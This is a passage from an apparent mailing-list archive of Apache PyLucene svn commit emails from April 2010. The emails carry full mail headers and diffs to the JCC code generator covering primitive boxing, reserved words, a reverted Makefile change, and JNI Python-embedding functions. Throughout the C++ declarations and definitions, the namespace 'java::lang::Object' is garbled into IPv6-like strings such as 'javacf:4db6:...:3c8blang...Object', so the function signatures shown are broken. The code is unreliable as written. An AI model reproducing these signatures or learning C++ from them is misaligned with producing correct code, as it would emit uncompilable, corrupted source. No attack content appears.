boxByte(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxCharacter(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxCharSequence(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxDouble(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxFloat(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxInteger(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); From [email protected] Wed Apr 07 00:17:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64947 invoked from network); 7 Apr 2010 00:17:54 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Apr 2010 00:17:54 -0000 Received: (qmail 81299 invoked by uid 500); 7 Apr 2010 00:17:54 -0000 Delivered-To: [email protected] Received: (qmail 81285 invoked by uid 500); 7 Apr 2010 00:17:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81277 invoked by uid 99); 7 Apr 2010 00:17:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Apr 2010 00:17:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Apr 2010 00:17:52 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5500223888CD; Wed, 7 Apr 2010 00:17:31 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931376 - in /lucene/pylucene/trunk: Makefile jcc/jcc/cpp.py Date: Wed, 07 Apr 2010 00:17:31 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Wed Apr 7 00:17:30 2010 New Revision: 931376 URL: http://svn.apache.org/viewvc?rev=931376&view=rev Log: added missing primitive types to default class list Modified: lucene/pylucene/trunk/Makefile lucene/pylucene/trunk/jcc/jcc/cpp.py Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=931376&r1=931375&r2=931376&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Wed Apr 7 00:17:30 2010 @@ -49,11 +49,11 @@ LUCENE=lucene-java-$(LUCENE_VER) #NUM_FILES=3 # Mac OS X 10.6 (MacPorts 1.8.0 64-bit Python 2.6, Java 1.6) -#PREFIX_PYTHON=/opt/local -#ANT=ant -#PYTHON=$(PREFIX_PYTHON)/bin/python -#JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 -#NUM_FILES=3 +PREFIX_PYTHON=/opt/local +ANT=ant +PYTHON=$(PREFIX_PYTHON)/bin/python +JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 +NUM_FILES=3 # Mac OS X 10.6 (64-bit and 32-bit Python 2.6 together, Java 1.6) #PREFIX_PYTHON=/usr Modified: lucene/pylucene/trunk/jcc/jcc/cpp.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/cpp.py?rev=931376&r1=931375&r2=931376&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/cpp.py (original) +++ lucene/pylucene/trunk/jcc/jcc/cpp.py Wed Apr 7 00:17:30 2010 @@ -466,9 +466,13 @@ def jcc(args): if moduleName: typeset.add(findClass('java/lang/Number')) typeset.add(findClass('java/lang/Boolean')) + typeset.add(findClass('java/lang/Byte')) + typeset.add(findClass('java/lang/Character')) + typeset.add(findClass('java/lang/Double')) + typeset.add(findClass('java/lang/Float')) typeset.add(findClass('java/lang/Integer')) typeset.add(findClass('java/lang/Long')) - typeset.add(findClass('java/lang/Double')) + typeset.add(findClass('java/lang/Short')) typeset.add(findClass('java/util/Iterator')) typeset.add(findClass('java/util/Enumeration')) typeset.add(findClass('java/io/StringWriter')) From [email protected] Wed Apr 07 00:19:30 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65143 invoked from network); 7 Apr 2010 00:19:30 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 7 Apr 2010 00:19:30 -0000 Received: (qmail 82613 invoked by uid 500); 7 Apr 2010 00:19:30 -0000 Delivered-To: [email protected] Received: (qmail 82595 invoked by uid 500); 7 Apr 2010 00:19:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82587 invoked by uid 99); 7 Apr 2010 00:19:30 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Apr 2010 00:19:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 07 Apr 2010 00:19:28 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 242B92388A60; Wed, 7 Apr 2010 00:19:07 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931379 - /lucene/pylucene/trunk/Makefile Date: Wed, 07 Apr 2010 00:19:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Wed Apr 7 00:19:06 2010 New Revision: 931379 URL: http://svn.apache.org/viewvc?rev=931379&view=rev Log: reverted accidental commit Modified: lucene/pylucene/trunk/Makefile Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=931379&r1=931378&r2=931379&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Wed Apr 7 00:19:06 2010 @@ -49,11 +49,11 @@ LUCENE=lucene-java-$(LUCENE_VER) #NUM_FILES=3 # Mac OS X 10.6 (MacPorts 1.8.0 64-bit Python 2.6, Java 1.6) -PREFIX_PYTHON=/opt/local -ANT=ant -PYTHON=$(PREFIX_PYTHON)/bin/python -JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 -NUM_FILES=3 +#PREFIX_PYTHON=/opt/local +#ANT=ant +#PYTHON=$(PREFIX_PYTHON)/bin/python +#JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 +#NUM_FILES=3 # Mac OS X 10.6 (64-bit and 32-bit Python 2.6 together, Java 1.6) #PREFIX_PYTHON=/usr From [email protected] Thu Apr 08 16:52:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92745 invoked from network); 8 Apr 2010 16:52:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Apr 2010 16:52:27 -0000 Received: (qmail 85052 invoked by uid 500); 8 Apr 2010 16:52:27 -0000 Delivered-To: [email protected] Received: (qmail 85033 invoked by uid 500); 8 Apr 2010 16:52:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85023 invoked by uid 99); 8 Apr 2010 16:52:26 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Apr 2010 16:52:26 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Apr 2010 16:52:23 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3030F23888E4; Thu, 8 Apr 2010 16:52:02 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r932000 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/cpp.py jcc/python.py jcc/sources/functions.cpp jcc/sources/functions.h Date: Thu, 08 Apr 2010 16:52:02 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Thu Apr 8 16:52:01 2010 New Revision: 932000 URL: http://svn.apache.org/viewvc?rev=932000&view=rev Log: - added support for auto-boxing Number from python int, long and float - added 'asm' to list of reserved words Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/cpp.py lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/functions.h Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=932000&r1=931999&r2=932000&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Thu Apr 8 16:52:01 2010 @@ -12,7 +12,9 @@ Version 2.5 -> - fixed bug with not heeding type parameter for --sequence get method - parameterized return values are now unboxed - improved auto-boxing of primitive type parameters - - added support for auto-boxing CharSequence from python strings + - added support for auto-boxing CharSequence from python str and unicode + - added support for auto-boxing Number from python int, long and float + - added 'asm' to list of reserved words - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/cpp.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/cpp.py?rev=932000&r1=931999&r2=932000&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/cpp.py (original) +++ lucene/pylucene/trunk/jcc/jcc/cpp.py Thu Apr 8 16:52:01 2010 @@ -80,7 +80,7 @@ PRIMITIVES = { 'boolean': 'Z', 'void': 'V' } RESERVED = set(['delete', 'and', 'or', 'not', 'xor', 'union', 'NULL', - 'register', 'const', 'bool', 'operator', 'typeof']) + 'register', 'const', 'bool', 'operator', 'typeof', 'asm']) def cppname(name): Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=932000&r1=931999&r2=932000&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Thu Apr 8 16:52:01 2010 @@ -60,6 +60,7 @@ BOXED = { 'java.lang.Boolean': (True, Tr 'java.lang.Float': (True, True), 'java.lang.Integer': (True, True), 'java.lang.Long': (True, True), + 'java.lang.Number': (True, False), 'java.lang.Short': (True, True), 'java.lang.String': (True, True) } Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=932000&r1=931999&r2=932000&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Thu Apr 8 16:52:01 2010 @@ -1784,6 +1784,34 @@ int boxLong(PyTypeObject *type, PyObject return 0; } +int boxNumber(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + if (obj != NULL) + *obj = Integer((jint) PyInt_AS_LONG(arg)); + } + else if (PyLong_Check(arg)) + { + if (obj != NULL) + *obj = Long((jlong) PyLong_AsLongLong(arg)); + } + else if (PyFloat_Check(arg)) + { + if (obj != NULL) + *obj = Double((jdouble) PyFloat_AS_DOUBLE(arg)); + } + else + return -1; + + return 0; +} + int boxShort(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) { int result = boxJObject(type, arg, obj); Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.h?rev=932000&r1=931999&r2=932000&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.h Thu Apr 8 16:52:01 2010 @@ -90,6 +90,7 @@ int boxDouble(PyTypeObject *type, PyObje int boxFloat(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxInteger(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxLong(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxNumber(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxShort(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxString(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int boxObject(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); From [email protected] Thu Apr 08 16:53:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92918 invoked from network); 8 Apr 2010 16:53:34 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 8 Apr 2010 16:53:34 -0000 Received: (qmail 86199 invoked by uid 500); 8 Apr 2010 16:53:34 -0000 Delivered-To: [email protected] Received: (qmail 86184 invoked by uid 500); 8 Apr 2010 16:53:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86176 invoked by uid 99); 8 Apr 2010 16:53:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Apr 2010 16:53:34 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED,T_FILL_THIS_FORM_SHORT X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Apr 2010 16:53:30 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 733ED23888E4; Thu, 8 Apr 2010 16:53:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r932001 - in /lucene/pylucene/trunk/jcc: java/org/apache/jcc/PythonVM.java jcc/sources/jcc.cpp Date: Thu, 08 Apr 2010 16:53:08 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Thu Apr 8 16:53:08 2010 New Revision: 932001 URL: http://svn.apache.org/viewvc?rev=932001&view=rev Log: improvements in python embedding support Modified: lucene/pylucene/trunk/jcc/java/org/apache/jcc/PythonVM.java lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Modified: lucene/pylucene/trunk/jcc/java/org/apache/jcc/PythonVM.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/java/org/apache/jcc/PythonVM.java?rev=932001&r1=932000&r2=932001&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/java/org/apache/jcc/PythonVM.java (original) +++ lucene/pylucene/trunk/jcc/java/org/apache/jcc/PythonVM.java Thu Apr 8 16:53:08 2010 @@ -52,4 +52,7 @@ public class PythonVM { public native Object instantiate(String moduleName, String className) throws PythonException; + + public native int acquireThreadState(); + public native int releaseThreadState(); } Modified: lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp?rev=932001&r1=932000&r2=932001&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Thu Apr 8 16:53:08 2010 @@ -458,225 +458,262 @@ _DLL_EXPORT PyObject *initVM(PyObject *s } } -extern "C" { - #ifdef _jcc_lib - static void raise_error(JNIEnv *vm_env, const char *message) - { - jclass cls = vm_env->FindClass("org/apache/jcc/PythonException"); - vm_env->ThrowNew(cls, message); - } - JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *vm, void *reserved) - { - JNIEnv *vm_env; +static void raise_error(JNIEnv *vm_env, const char *message) +{ + jclass cls = vm_env->FindClass("org/apache/jcc/PythonException"); + vm_env->ThrowNew(cls, message); +} - if (!vm->GetEnv((void **) &vm_env, JNI_VERSION_1_4)) - env = new JCCEnv(vm, vm_env); +static void _PythonVM_init(JNIEnv *vm_env, jobject self, + jstring programName, jobjectArray args) +{ + const char *str = vm_env->GetStringUTFChars(programName, JNI_FALSE); +#ifdef linux + char buf[32]; - registerNatives(vm_env); + // load python runtime for other .so modules to link (such as _time.so) + sprintf(buf, "libpython%d.%d.so", PY_MAJOR_VERSION, PY_MINOR_VERSION); + dlopen(buf, RTLD_NOW | RTLD_GLOBAL); +#endif - return JNI_VERSION_1_4; - } + Py_SetProgramName((char *) str); - JNIEXPORT void JNICALL Java_org_apache_jcc_PythonVM_init(JNIEnv *vm_env, jobject self, jstring programName, jobjectArray args) + PyEval_InitThreads(); + Py_Initialize(); + + if (args) { - const char *str = vm_env->GetStringUTFChars(programName, JNI_FALSE); -#ifdef linux - char buf[32]; + int argc = vm_env->GetArrayLength(args); + char **argv = (char **) calloc(argc + 1, sizeof(char *)); - // load python runtime for other .so modules to link (such as _time.so) - sprintf(buf, "libpython%d.%d.so", PY_MAJOR_VERSION, PY_MINOR_VERSION); - dlopen(buf, RTLD_NOW | RTLD_GLOBAL); -#endif + argv[0] = (char *) str; + for (int i = 0; i < argc; i++) { + jstring arg = (jstring) vm_env->GetObjectArrayElement(args, i); + argv[i + 1] = (char *) vm_env->GetStringUTFChars(arg, JNI_FALSE); + } - Py_SetProgramName((char *) str); + PySys_SetArgv(argc + 1, argv); - PyEval_InitThreads(); - Py_Initialize(); + for (int i = 0; i < argc; i++) { + jstring arg = (jstring) vm_env->GetObjectArrayElement(args, i); + vm_env->ReleaseStringUTFChars(arg, argv[i + 1]); + } + free(argv); + } + else + PySys_SetArgv(1, (char **) &str); - if (args) - { - int argc = vm_env->GetArrayLength(args); - char **argv = (char **) calloc(argc + 1, sizeof(char *)); + vm_env->ReleaseStringUTFChars(programName, str); + PyEval_ReleaseLock(); +} - argv[0] = (char *) str; - for (int i = 0; i < argc; i++) { - jstring arg = (jstring) vm_env->GetObjectArrayElement(args, i); - argv[i + 1] = (char *) vm_env->GetStringUTFChars(arg, JNI_FALSE); - } - - PySys_SetArgv(argc + 1, argv); - - for (int i = 0; i < argc; i++) { - jstring arg = (jstring) vm_env->GetObjectArrayElement(args, i); - vm_env->ReleaseStringUTFChars(arg, argv[i + 1]); - } - free(argv); - } - else - PySys_SetArgv(1, (char **) &str); +static jobject _PythonVM_instantiate(JNIEnv *vm_env, jobject self, + jstring moduleName, jstring className) +{ + PythonGIL gil(vm_env); + + const char *modStr = vm_env->GetStringUTFChars(moduleName, JNI_FALSE); + PyObject *module = + PyImport_ImportModule((char *) modStr); // python 2.4 cast + + vm_env->ReleaseStringUTFChars(moduleName, modStr); - vm_env->ReleaseStringUTFChars(programName, str); - PyEval_ReleaseLock(); + if (!module) + { + raise_error(vm_env, "import failed"); + return NULL; } - JNIEXPORT jobject JNICALL Java_org_apache_jcc_PythonVM_instantiate(JNIEnv *vm_env, jobject self, jstring moduleName, jstring className) + const char *clsStr = vm_env->GetStringUTFChars(className, JNI_FALSE); + PyObject *cls = + PyObject_GetAttrString(module, (char *) clsStr); // python 2.4 cast + PyObject *obj; + jobject jobj; + + vm_env->ReleaseStringUTFChars(className, clsStr); + Py_DECREF(module); + + if (!cls) { - PythonGIL gil(vm_env); + raise_error(vm_env, "class not found"); + return NULL; + } + + obj = PyObject_CallFunctionObjArgs(cls, NULL); + Py_DECREF(cls); - const char *modStr = vm_env->GetStringUTFChars(moduleName, JNI_FALSE); - PyObject *module = - PyImport_ImportModule((char *) modStr); // python 2.4 cast + if (!obj) + { + raise_error(vm_env, "instantiation failed"); + return NULL; + } - vm_env->ReleaseStringUTFChars(moduleName, modStr); + PyObject *cObj = PyObject_GetAttrString(obj, "_jobject"); - if (!module) - { - raise_error(vm_env, "import failed"); - return NULL; - } + if (!cObj) + { + raise_error(vm_env, "instance does not proxy a java object"); + Py_DECREF(obj); - const char *clsStr = vm_env->GetStringUTFChars(className, JNI_FALSE); - PyObject *cls = - PyObject_GetAttrString(module, (char *) clsStr); // python 2.4 cast - PyObject *obj; - jobject jobj; + return NULL; + } - vm_env->ReleaseStringUTFChars(className, clsStr); - Py_DECREF(module); + jobj = (jobject) PyCObject_AsVoidPtr(cObj); + Py_DECREF(cObj); - if (!cls) - { - raise_error(vm_env, "class not found"); - return NULL; - } + jobj = vm_env->NewLocalRef(jobj); + Py_DECREF(obj); - obj = PyObject_CallFunctionObjArgs(cls, NULL); - Py_DECREF(cls); + return jobj; +} - if (!obj) - { - raise_error(vm_env, "instantiation failed"); - return NULL; - } +extern "C" { - PyObject *cObj = PyObject_GetAttrString(obj, "_jobject"); + JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *vm, void *reserved) + { + JNIEnv *vm_env; - if (!cObj) - { - raise_error(vm_env, "instance does not proxy a java object"); - Py_DECREF(obj); + if (!vm->GetEnv((void **) &vm_env, JNI_VERSION_1_4)) + env = new JCCEnv(vm, vm_env); - return NULL; - } + registerNatives(vm_env); - jobj = (jobject) PyCObject_AsVoidPtr(cObj); - Py_DECREF(cObj); + return JNI_VERSION_1_4; + } - jobj = vm_env->NewLocalRef(jobj); - Py_DECREF(obj); + JNIEXPORT void JNICALL Java_org_apache_jcc_PythonVM_init(JNIEnv *vm_env, jobject self, jstring programName, jobjectArray args) + { + return _PythonVM_init(vm_env, self, programName, args); + } - return jobj; + JNIEXPORT jobject JNICALL Java_org_apache_jcc_PythonVM_instantiate(JNIEnv *vm_env, jobject self, jstring moduleName, jstring className) + { + return _PythonVM_instantiate(vm_env, self, moduleName, className); } -#endif - void JNICALL PythonException_getErrorInfo(JNIEnv *vm_env, jobject self) + JNIEXPORT jint JNICALL Java_org_apache_jcc_PythonVM_acquireThreadState(JNIEnv *vm_env) { - PythonGIL gil(vm_env); + PyGILState_STATE state = PyGILState_Ensure(); + PyThreadState *tstate = PyGILState_GetThisThreadState(); + int result = -1; - if (!PyErr_Occurred()) - return; + if (tstate != NULL && tstate->gilstate_counter >= 1) + result = ++tstate->gilstate_counter; - PyObject *type, *value, *tb, *errorName; - jclass jcls = vm_env->GetObjectClass(self); + PyGILState_Release(state); + return result; + } - PyErr_Fetch(&type, &value, &tb); + JNIEXPORT jint JNICALL Java_org_apache_jcc_PythonVM_releaseThreadState(JNIEnv *vm_env) + { + PyGILState_STATE state = PyGILState_Ensure(); + PyThreadState *tstate = PyGILState_GetThisThreadState(); + int result = -1; - errorName = PyObject_GetAttrString(type, "__name__"); - if (errorName != NULL) - { - jfieldID fid = - vm_env->GetFieldID(jcls, "errorName", "Ljava/lang/String;"); - jstring str = env->fromPyString(errorName); + if (tstate != NULL && tstate->gilstate_counter >= 1) + result = --tstate->gilstate_counter; - vm_env->SetObjectField(self, fid, str); - vm_env->DeleteLocalRef(str); - Py_DECREF(errorName); - } + PyGILState_Release(state); + return result; + } +}; - if (value != NULL) - { - PyObject *message = PyObject_Str(value); +void JNICALL PythonException_getErrorInfo(JNIEnv *vm_env, jobject self) +{ + PythonGIL gil(vm_env); - if (message != NULL) - { - jfieldID fid = - vm_env->GetFieldID(jcls, "message", "Ljava/lang/String;"); - jstring str = env->fromPyString(message); - - vm_env->SetObjectField(self, fid, str); - vm_env->DeleteLocalRef(str); - Py_DECREF(message); - } - } + if (!PyErr_Occurred()) + return; - PyObject *module = NULL, *cls = NULL, *stringIO = NULL, *result = NULL; - PyObject *_stderr = PySys_GetObject("stderr"); - if (!_stderr) - goto err; - - module = PyImport_ImportModule("cStringIO"); - if (!module) - goto err; - - cls = PyObject_GetAttrString(module, "StringIO"); - Py_DECREF(module); - if (!cls) - goto err; - - stringIO = PyObject_CallObject(cls, NULL); - Py_DECREF(cls); - if (!stringIO) - goto err; - - Py_INCREF(_stderr); - PySys_SetObject("stderr", stringIO); + PyObject *type, *value, *tb, *errorName; + jclass jcls = vm_env->GetObjectClass(self); - PyErr_Restore(type, value, tb); - PyErr_Print(); + PyErr_Fetch(&type, &value, &tb); - result = PyObject_CallMethod(stringIO, "getvalue", NULL); - Py_DECREF(stringIO); + errorName = PyObject_GetAttrString(type, "__name__"); + if (errorName != NULL) + { + jfieldID fid = + vm_env->GetFieldID(jcls, "errorName", "Ljava/lang/String;"); + jstring str = env->fromPyString(errorName); + + vm_env->SetObjectField(self, fid, str); + vm_env->DeleteLocalRef(str); + Py_DECREF(errorName); + } + + if (value != NULL) + { + PyObject *message = PyObject_Str(value); - if (result != NULL) + if (message != NULL) { jfieldID fid = - vm_env->GetFieldID(jcls, "traceback", "Ljava/lang/String;"); - jstring str = env->fromPyString(result); + vm_env->GetFieldID(jcls, "message", "Ljava/lang/String;"); + jstring str = env->fromPyString(message); vm_env->SetObjectField(self, fid, str); vm_env->DeleteLocalRef(str); - Py_DECREF(result); + Py_DECREF(message); } + } - PySys_SetObject("stderr", _stderr); - Py_DECREF(_stderr); + PyObject *module = NULL, *cls = NULL, *stringIO = NULL, *result = NULL; + PyObject *_stderr = PySys_GetObject("stderr"); + if (!_stderr) + goto err; + + module = PyImport_ImportModule("cStringIO"); + if (!module) + goto err; + + cls = PyObject_GetAttrString(module, "StringIO"); + Py_DECREF(module); + if (!cls) + goto err; + + stringIO = PyObject_CallObject(cls, NULL); + Py_DECREF(cls); + if (!stringIO) + goto err; + + Py_INCREF(_stderr); + PySys_SetObject("stderr", stringIO); - return; + PyErr_Restore(type, value, tb); + PyErr_Print(); - err: - PyErr_Restore(type, value, tb); - } + result = PyObject_CallMethod(stringIO, "getvalue", NULL); + Py_DECREF(stringIO); - void JNICALL PythonException_clear(JNIEnv *vm_env, jobject self) + if (result != NULL) { - PythonGIL gil(vm_env); - PyErr_Clear(); + jfieldID fid = + vm_env->GetFieldID(jcls, "traceback", "Ljava/lang/String;"); + jstring str = env->fromPyString(result); + + vm_env->SetObjectField(self, fid, str); + vm_env->DeleteLocalRef(str); + Py_DECREF(result); } -}; -#ifdef _jcc_lib + PySys_SetObject("stderr", _stderr); + Py_DECREF(_stderr); + + return; + + err: + PyErr_Restore(type, value, tb); +} + +void JNICALL PythonException_clear(JNIEnv *vm_env, jobject self) +{ + PythonGIL gil(vm_env); + PyErr_Clear(); +} + static void registerNatives(JNIEnv *vm_env) { jclass cls = vm_env->FindClass("org/apache/jcc/PythonException"); @@ -687,4 +724,5 @@ static void registerNatives(JNIEnv *vm_e vm_env->RegisterNatives(cls, methods, 2); } -#endif + +#endif /* _jcc_lib */ From [email protected] Mon Apr 12 19:33:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80184 invoked from network); 12 Apr 2010 19:33:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Apr 2010 19:33:36 -0000 Received: (qmail 98251 invoked by uid 500); 12 Apr 2010 19:33:36 